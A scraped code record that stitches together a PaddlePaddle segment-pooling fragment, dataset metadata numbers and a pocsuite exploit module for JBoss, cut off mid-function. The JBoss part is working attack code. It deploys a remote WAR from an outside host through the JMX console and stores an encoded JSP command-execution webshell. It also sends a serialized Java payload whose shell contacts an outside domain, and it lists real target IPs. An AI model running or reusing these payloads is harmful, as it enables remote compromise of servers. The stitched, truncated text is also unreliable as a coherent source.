"segment_pool")
check_variable_and_dtype(segment_ids, "SegmentIds", ("int32", "int64"),
"segment_pool")
helper = LayerHelper("segment_mean", **locals())
out = helper.create_variable_for_type_inference(dtype=data.dtype)
summed_ids = helper.create_variable_for_type_inference(dtype=data.dtype)
helper.append_op(type="segment_pool",
inputs={
"X": data,
"SegmentIds": segment_ids
},
outputs={
"Out": out,
"SummedIds": summed_ids
},
attrs={"pooltype": "MEAN"})
return out
def segment_min(data, segment_ids, name=None):
r"""
Segment min operator.
This operator calculate the minimum elements of input `data` which with
the same index in `segment_ids`.
It computes a tensor such that $out_i = \\min_{j} data_{j}$
where min is over j such that `segment_ids[j] == i`.
Args:
data (tensor): a tensor, available data type float32, float64, int32, int64.
segment_ids (tensor): a 1-d tensor, which have the same size
with the first dimension of input data.
available data type is int32, int64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
output (Tensor): the reduced result.
Examples:
.. code-block:: python
import paddle
data = paddle.to_tensor([[1, 2, 3], [3, 2, 1], [4, 5, 6]], dtype='float32')
segment_ids = paddle.to_tensor([0, 0, 1], dtype='int32')
out = paddle.incubate.segment_min(data, segment_ids)
#Outputs: [[1., 2., 1.], [4., 5., 6.]]
"""
if in_dygraph_mode():
return _C_ops.final_state_segment_pool(data, segment_ids, "MIN")[0]
if _non_static_mode():
out, tmp = _C_ops.segment_pool(data, segment_ids, 'pooltype', "MIN")
return out
check_variable_and_dtype(data, "X",
("float32", "float64", "int32", "int64"),
"segment_pool")
check_variable_and_dtype(segment_ids, "SegmentIds", ("int32", "int64"),
"segment_pool")
helper = LayerHelper("segment_min", **locals())
out = helper.create_variable_for_type_inference(dtype=data.dtype)
summed_ids = helper.create_variable_for_type_inference(dtype=data.dtype)
helper.append_op(type="segment_pool",
inputs={
"X": data,
"SegmentIds": segment_ids
},
outputs={
"Out": out,
"SummedIds": summed_ids
},
attrs={"pooltype": "MIN"})
return out
def segment_max(data, segment_ids, name=None):
r"""
Segment max operator.
This operator calculate the maximum elements of input `data` which with
the same index in `segment_ids`.
It computes a tensor such that $out_i = \\max_{j} data_{j}$
where max is over j such that `segment_ids[j] == i`.
Args:
data (tensor): a tensor, available data type float32, float64, int32, int64.
segment_ids (tensor): a 1-d tensor, which have the same size
with the first dimension of input data.
available data type is int32, int64.
name (str, optional): Name for the operation (optional, default is None).
For more information, please refer to :ref:`api_guide_Name`.
Returns:
output (Tensor): the reduced result.
Examples:
.. code-block:: python
import paddle
data = paddle.to_tensor([[1, 2, 3], [3, 2, 1], [4, 5, 6]], dtype='float32')
segment_ids = paddle.to_tensor([0, 0, 1], dtype='int32')
out = paddle.incubate.segment_max(data, segment_ids)
#Outputs: [[3., 2., 3.], [4., 5., 6.]]
"""
if in_dygraph_mode():
out, tmp = _C_ops.final_state_segment_pool(data, segment_ids, "MAX")
return out
if _non_static_mode():
out, tmp = _C_ops.segment_pool(data, segment_ids, 'pooltype', "MAX")
return out
check_variable_and_dtype(data, "X",
("float32", "float64", "int32", "int64"),
"segment_pool")
check_variable_and_dtype(segment_ids, "SegmentIds", ("int32", "int64"),
"segment_pool")
helper = LayerHelper("segment_max", **locals())
out = helper.create_variable_for_type_inference(dtype=data.dtype)
summed_ids = helper.create_variable_for_type_inference(dtype=data.dtype)
helper.append_op(type="segment_pool",
inputs={
"X": data,
"SegmentIds": segment_ids
},
outputs={
"Out": out,
"SummedIds": summed_ids
},
attrs={"pooltype": "MAX"})
return out
| 38.344697
| 88
| 0.56505
| 1,217
| 10,123
| 4.508628
| 0.14544
| 0.074722
| 0.040824
| 0.034445
| 0.821214
| 0.788044
| 0.788044
| 0.762894
| 0.762894
| 0.755786
| 0
| 0.029283
| 0.325299
| 10,123
| 263
| 89
| 38.490494
| 0.774085
| 0.479601
| 0
| 0.654545
| 0
| 0
| 0.115882
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036364
| false
| 0
| 0.036364
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6b170368577f2d8f144661035de86847f9cb090f
| 30
|
py
|
Python
|
Packet_for_lesson5/__init__.py
|
IslamRaslambekov/HomeWork
|
1adb97cee4ada46fbcca3fa6c575cf43a4133ef2
|
[
"MIT"
] | null | null | null |
Packet_for_lesson5/__init__.py
|
IslamRaslambekov/HomeWork
|
1adb97cee4ada46fbcca3fa6c575cf43a4133ef2
|
[
"MIT"
] | null | null | null |
Packet_for_lesson5/__init__.py
|
IslamRaslambekov/HomeWork
|
1adb97cee4ada46fbcca3fa6c575cf43a4133ef2
|
[
"MIT"
] | null | null | null |
from .division_master import *
| 30
| 30
| 0.833333
| 4
| 30
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 30
| 1
| 30
| 30
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6b1cb8e6d34ea0ae7366cef4c9936340e6d68cf9
| 27,158
|
py
|
Python
|
vul/13-JBoss-serialization-getshell.py
|
zx273983653/vulscan
|
787397e267c4e6469522ee0abe55b3e98f968d4a
|
[
"MIT"
] | 582
|
2019-02-23T09:23:33.000Z
|
2022-03-31T04:42:08.000Z
|
vul/13-JBoss-serialization-getshell.py
|
git-wsf/vulscan
|
112f8d6104daecfaaad579f73029a26d56aaa9b3
|
[
"MIT"
] | 6
|
2019-03-20T10:37:48.000Z
|
2020-03-10T06:20:07.000Z
|
vul/13-JBoss-serialization-getshell.py
|
git-wsf/vulscan
|
112f8d6104daecfaaad579f73029a26d56aaa9b3
|
[
"MIT"
] | 183
|
2019-02-23T06:00:18.000Z
|
2022-03-20T02:17:57.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
#命令行
from pocsuite import pocsuite_cli
#验证模块
from pocsuite import pocsuite_verify
#攻击模块
from pocsuite import pocsuite_attack
#控制台模式
from pocsuite import pocsuite_console
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
"""
JBoss 三种POC漏洞检测 author:https://github.com/joaomatosf/jexboss
"""
from sys import exit, version_info
from time import sleep
from random import randint
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
try:
from urllib3 import disable_warnings, PoolManager
from urllib3.util.timeout import Timeout
except ImportError:
ver = version_info[0] if version_info[0] >= 3 else ""
raise ("\n * Package urllib3 not installed. Please install the package urllib3 before continue.\n"
+ " Example: \n"
+ " # apt-get install python%s-pip ; easy_install%s urllib3\n" % (ver, ver))
from urllib3 import disable_warnings, PoolManager
from urllib3.util.timeout import Timeout
#忽略 提示的警告信息
disable_warnings()
#线程安全池
timeout = Timeout(connect=3.0, read=6.0)
pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE')
user_agents = ["Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
"Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36",
"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"]
class JbossPOC(POCBase):
vulID = '13' # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
version = '1' #默认为1
vulDate = '2017-06-29' #漏洞公开的时间,不知道就写今天
author = 'i@cdxy.me' # PoC作者的大名
createDate = '2017-06-29'# 编写 PoC 的日期
updateDate = '2017-06-29'# PoC 更新的时间,默认和编写时间一样
references = 'https://github.com/Xyntax/POC-T'# 漏洞地址来源,0day不用写
name = 'JBoss serialization getshell'# PoC 名称
appPowerLink = 'http://www.jboss.org/'# 漏洞厂商主页地址
appName = 'JBoss'# 漏洞应用名称
appVersion = 'www.seebug.org/vuldb/ssvid-89723'# 漏洞影响版本
vulType = 'code-exec'#漏洞类型,类型参考见 漏洞类型规范表
desc = '''
Jboss 反序列化漏洞
''' # 漏洞简要描述
samples = ["1.197.56.123:8087","50.200.187.230:8087",]# 测试样列,就是用 PoC 测试成功的网站
install_requires = [] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
cvss = u"严重" #严重,高危,中危,低危
def get_successfully(self,url, path):
"""
Test if a GET to a URL is successful
:param url: The base URL
:param path: The URL path
:return: The HTTP status code
"""
sleep(5)
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
r = pool.request('GET', url + path, redirect=False, headers=headers, timeout=3)
result = r.status
if result == 404:
sleep(7)
r = pool.request('GET', url + path, redirect=False, headers=headers, timeout=3)
result = r.status
return result
def exploit_jmx_console_main_deploy(self,url):
"""
Exploit MainDeployer to deploy a JSP shell. Does not work in JBoss 5 (bug in JBoss 5).
/jmx-console/HtmlAdaptor
:param url: The url to exploit
:return: The HTTP status code
"""
if not 'http' in url[:4]:
url = "http://" + url
jsp = "http://www.joaomatosf.com/rnp/jexws.war"
payload = ("/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service="
"MainDeployer&methodIndex=19&arg0=" + jsp)
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
pool.request('HEAD', url + payload, redirect=False, headers=headers, timeout=3)
return self.get_successfully(url, "/jexws/jexws.jsp")
def exploit_jmx_console_file_repository(self,url):
"""
Exploit DeploymentFileRepository to deploy a JSP shell
Tested and working in JBoss 4, 5. Does not work in JBoss 6.
/jmx-console/HtmlAdaptor
:param url: The URL to exploit
:return: The HTTP status code
"""
jsp = ("%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75"
"%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%2c%20%6a%61%76%61%2e%6e"
"%65%74%2e%2a%22%20%70%61%67%65%45%6e%63%6f%64%69%6e%67%3d%22%55%54%46"
"%2d%38%22%25%3e%3c%70%72%65%3e%3c%25%69%66%20%28%72%65%71%75%65%73%74"
"%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%70%70%70%22%29%20%21%3d"
"%20%6e%75%6c%6c%29%20%7b%20%53%74%72%69%6e%67%20%77%72%69%74%65%70%65"
"%72%6d%69%73%73%69%6f%6e%20%3d%20%28%6e%65%77%20%44%61%74%65%28%29%2e"
"%74%6f%53%74%72%69%6e%67%28%29%2e%73%70%6c%69%74%28%22%3a%22%29%5b%30"
"%5d%2b%22%68%2e%6c%6f%67%22%29%2e%72%65%70%6c%61%63%65%41%6c%6c%28%22"
"%20%22%2c%20%22%2d%22%29%3b%20%53%74%72%69%6e%67%20%73%68%5b%5d%20%3d"
"%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22"
"%70%70%70%22%29%2e%73%70%6c%69%74%28%22%20%22%29%3b%20%63%68%65%63%6b"
"%2e%73%65%74%52%65%71%75%65%73%74%50%72%6f%70%65%72%74%79%28%22%55%73"
"%65%72%2d%41%67%65%6e%74%22%2c%20%72%65%71%75%65%73%74%2e%67%65%74%48"
"%65%61%64%65%72%28%22%48%6f%73%74%22%29%2b%22%3c%2d%22%2b%72%65%71%75"
"%65%73%74%2e%67%65%74%52%65%6d%6f%74%65%41%64%64%72%28%29%29%3b%20%69"
"%66%20%28%21%6e%65%77%20%46%69%6c%65%28%22%63%68%65%63%6b%5f%22%2b%77"
"%72%69%74%65%70%65%72%6d%69%73%73%69%6f%6e%29%2e%65%78%69%73%74%73%28"
"%29%29%7b%20%50%72%69%6e%74%57%72%69%74%65%72%20%77%72%69%74%65%72%20"
"%3d%20%6e%65%77%20%50%72%69%6e%74%57%72%69%74%65%72%28%22%63%68%65%63"
"%6b%5f%22%2b%77%72%69%74%65%70%65%72%6d%69%73%73%69%6f%6e%29%3b%20%63"
"%68%65%63%6b%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20"
"%77%72%69%74%65%72%2e%63%6c%6f%73%65%28%29%3b%20%7d%20%65%6c%73%65%20"
"%69%66%20%28%73%68%5b%30%5d%2e%63%6f%6e%74%61%69%6e%73%28%22%69%64%22"
"%29%20%7c%7c%20%73%68%5b%30%5d%2e%63%6f%6e%74%61%69%6e%73%28%22%69%70"
"%63%6f%6e%66%69%67%22%29%29%20%63%68%65%63%6b%2e%67%65%74%49%6e%70%75"
"%74%53%74%72%65%61%6d%28%29%3b%20%74%72%79%20%7b%20%50%72%6f%63%65%73"
"%73%20%70%3b%20%69%66%20%28%53%79%73%74%65%6d%2e%67%65%74%50%72%6f%70"
"%65%72%74%79%28%22%6f%73%2e%6e%61%6d%65%22%29%2e%74%6f%4c%6f%77%65%72"
"%43%61%73%65%28%29%2e%69%6e%64%65%78%4f%66%28%22%77%69%6e%22%29%20%3e"
"%20%30%29%7b%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e"
"%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%6d%64%2e%65%78%65%20%2f%63"
"%20%22%2b%73%68%29%3b%20%7d%20%65%6c%73%65%20%7b%70%20%3d%20%52%75%6e"
"%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28"
"%73%68%29%3b%7d%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%64%20"
"%3d%20%6e%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6e%65"
"%77%20%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%70%2e%67"
"%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%3b%20%53%74%72%69"
"%6e%67%20%64%69%73%72%20%3d%20%64%2e%72%65%61%64%4c%69%6e%65%28%29%3b"
"%20%77%68%69%6c%65%20%28%64%69%73%72%20%21%3d%20%6e%75%6c%6c%29%20%7b"
"%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73"
"%72%20%3d%20%64%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%63%61"
"%74%63%68%28%45%78%63%65%70%74%69%6f%6e%20%65%29%20%7b%6f%75%74%2e%70"
"%72%69%6e%74%6c%6e%28%22%55%6e%6b%6e%6f%77%6e%20%63%6f%6d%6d%61%6e%64"
"%2e%22%29%3b%7d%7d%25%3e")
payload = ("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service="
"DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0="
"jexws.war&argType=java.lang.String&arg1=jexws&argType=java.lang.St"
"ring&arg2=.jsp&argType=java.lang.String&arg3=" + jsp + "&argType=boolean&arg4=True")
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
pool.request('HEAD', url + payload, redirect=False, headers=headers, timeout=3)
return self.get_successfully(url, "/jexws/jexws.jsp")
def exploit_jmx_invoker_file_repository(self,url, version):
"""
Exploits the JMX invoker
tested and works in JBoss 4, 5
MainDeploy, shell in data
# /invoker/JMXInvokerServlet
:param url: The URL to exploit
:return:
"""
payload = ("\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e"
"\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72\x73\x68\x61\x6c\x6c"
"\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xf6\x06\x95\x27\x41\x3e\xa4"
"\xbe\x0c\x00\x00\x78\x70\x70\x77\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72"
"\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72"
"\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65"
"\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65"
"\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70")
payload += ("\xe3\x2c\x60\xe6") if version == 0 else ("\x26\x95\xbe\x0a")
payload += (
"\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61"
"\x74\x69\x6f\x6e\x2e\x4d\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75"
"\x65\xea\xcc\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x04\x00"
"\x00\x00\x05\xaa\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e"
"\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29"
"\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00\x1b\x6a\x61\x76\x61\x78"
"\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e"
"\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c"
"\x6a\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69\x63\x65"
"\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c\x65\x52\x65\x70\x6f"
"\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73\x74\x6f\x72\x65\x75\x71\x00\x7e"
"\x00\x00\x00\x00\x00\x05\x74\x00\x0a\x6a\x65\x78\x69\x6e\x76\x2e\x77\x61\x72"
"\x74\x00\x06\x6a\x65\x78\x69\x6e\x76\x74\x00\x04\x2e\x6a\x73\x70\x74\x04\x71"
"\x3c\x25\x40\x20\x70\x61\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61"
"\x76\x61\x2e\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a"
"\x2c\x20\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x2a\x22\x20\x70\x61\x67\x65\x45"
"\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x25\x3e\x3c\x70"
"\x72\x65\x3e\x3c\x25\x69\x66\x28\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74"
"\x50\x61\x72\x61\x6d\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x20\x21\x3d"
"\x20\x6e\x75\x6c\x6c\x29\x7b\x20\x55\x52\x4c\x20\x75\x72\x6c\x20\x3d\x20\x6e"
"\x65\x77\x20\x55\x52\x4c\x28\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x65\x62\x73"
"\x68\x65\x6c\x6c\x2e\x6a\x65\x78\x62\x6f\x73\x73\x2e\x6e\x65\x74\x2f\x22\x29"
"\x3b\x20\x48\x74\x74\x70\x55\x52\x4c\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e"
"\x20\x63\x68\x65\x63\x6b\x20\x3d\x20\x28\x48\x74\x74\x70\x55\x52\x4c\x43\x6f"
"\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x29\x20\x75\x72\x6c\x2e\x6f\x70\x65\x6e\x43"
"\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x28\x29\x3b\x20\x53\x74\x72\x69\x6e\x67"
"\x20\x77\x72\x69\x74\x65\x70\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x20\x3d\x20"
"\x28\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x2e\x74\x6f\x53\x74\x72\x69\x6e"
"\x67\x28\x29\x2e\x73\x70\x6c\x69\x74\x28\x22\x3a\x22\x29\x5b\x30\x5d\x2b\x22"
"\x68\x2e\x6c\x6f\x67\x22\x29\x2e\x72\x65\x70\x6c\x61\x63\x65\x41\x6c\x6c\x28"
"\x22\x20\x22\x2c\x20\x22\x2d\x22\x29\x3b\x20\x53\x74\x72\x69\x6e\x67\x20\x73"
"\x68\x5b\x5d\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61"
"\x72\x61\x6d\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x2e\x73\x70\x6c\x69"
"\x74\x28\x22\x20\x22\x29\x3b\x20\x63\x68\x65\x63\x6b\x2e\x73\x65\x74\x52\x65"
"\x71\x75\x65\x73\x74\x50\x72\x6f\x70\x65\x72\x74\x79\x28\x22\x55\x73\x65\x72"
"\x2d\x41\x67\x65\x6e\x74\x22\x2c\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65"
"\x74\x48\x65\x61\x64\x65\x72\x28\x22\x48\x6f\x73\x74\x22\x29\x2b\x22\x3c\x2d"
"\x22\x2b\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x52\x65\x6d\x6f\x74\x65"
"\x41\x64\x64\x72\x28\x29\x29\x3b\x20\x69\x66\x20\x28\x21\x6e\x65\x77\x20\x46"
"\x69\x6c\x65\x28\x22\x63\x68\x65\x63\x6b\x5f\x22\x2b\x77\x72\x69\x74\x65\x70"
"\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x29\x2e\x65\x78\x69\x73\x74\x73\x28\x29"
"\x29\x7b\x20\x50\x72\x69\x6e\x74\x57\x72\x69\x74\x65\x72\x20\x77\x72\x69\x74"
"\x65\x72\x20\x3d\x20\x6e\x65\x77\x20\x50\x72\x69\x6e\x74\x57\x72\x69\x74\x65"
"\x72\x28\x22\x63\x68\x65\x63\x6b\x5f\x22\x2b\x77\x72\x69\x74\x65\x70\x65\x72"
"\x6d\x69\x73\x73\x69\x6f\x6e\x29\x3b\x20\x63\x68\x65\x63\x6b\x2e\x67\x65\x74"
"\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x3b\x20\x77\x72\x69\x74"
"\x65\x72\x2e\x63\x6c\x6f\x73\x65\x28\x29\x3b\x20\x7d\x20\x65\x6c\x73\x65\x20"
"\x69\x66\x20\x28\x73\x68\x5b\x30\x5d\x2e\x63\x6f\x6e\x74\x61\x69\x6e\x73\x28"
"\x22\x69\x64\x22\x29\x20\x7c\x7c\x20\x73\x68\x5b\x30\x5d\x2e\x63\x6f\x6e\x74"
"\x61\x69\x6e\x73\x28\x22\x69\x70\x63\x6f\x6e\x66\x69\x67\x22\x29\x29\x20\x63"
"\x68\x65\x63\x6b\x2e\x67\x65\x74\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d"
"\x28\x29\x3b\x20\x74\x72\x79\x20\x7b\x20\x50\x72\x6f\x63\x65\x73\x73\x20\x70"
"\x3b\x20\x69\x66\x20\x28\x53\x79\x73\x74\x65\x6d\x2e\x67\x65\x74\x50\x72\x6f"
"\x70\x65\x72\x74\x79\x28\x22\x6f\x73\x2e\x6e\x61\x6d\x65\x22\x29\x2e\x74\x6f"
"\x4c\x6f\x77\x65\x72\x43\x61\x73\x65\x28\x29\x2e\x69\x6e\x64\x65\x78\x4f\x66"
"\x28\x22\x77\x69\x6e\x22\x29\x20\x3e\x20\x30\x29\x7b\x20\x70\x20\x3d\x20\x52"
"\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x7a\x00"
"\x00\x01\xb2\x28\x29\x2e\x65\x78\x65\x63\x28\x22\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x2f\x63\x20\x22\x2b\x73\x68\x29\x3b\x20\x7d\x20\x65\x6c\x73\x65\x20\x7b"
"\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65\x74\x52\x75\x6e\x74"
"\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28\x73\x68\x29\x3b\x7d\x20\x42\x75"
"\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x20\x64\x20\x3d\x20\x6e\x65"
"\x77\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x28\x6e\x65"
"\x77\x20\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x52\x65\x61\x64\x65\x72"
"\x28\x70\x2e\x67\x65\x74\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29"
"\x29\x29\x3b\x20\x53\x74\x72\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x64"
"\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65\x20"
"\x28\x64\x69\x73\x72\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x29\x20\x7b\x20\x6f\x75"
"\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28\x64\x69\x73\x72\x29\x3b\x20\x64\x69"
"\x73\x72\x20\x3d\x20\x64\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20"
"\x7d\x20\x7d\x63\x61\x74\x63\x68\x28\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x20"
"\x65\x29\x20\x7b\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28\x22\x55\x6e"
"\x6b\x6e\x6f\x77\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2e\x22\x29\x3b\x7d\x7d"
"\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x42\x6f\x6f"
"\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee\x02\x00\x01\x5a\x00\x05\x76"
"\x61\x6c\x75\x65\x78\x70\x01\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c"
"\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47"
"\x02\x00\x00\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61"
"\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00\x7e\x00\x0f"
"\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65\x61\x6e\x69\x0e\x8b\x92"
"\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00\x01\x73\x72\x00\x22\x6f\x72\x67\x2e"
"\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e"
"\x76\x6f\x63\x61\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85\xf9"
"\x02\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00\x00\x04"
"\x70\x78")
headers = {"Content-Type": "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",
"Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
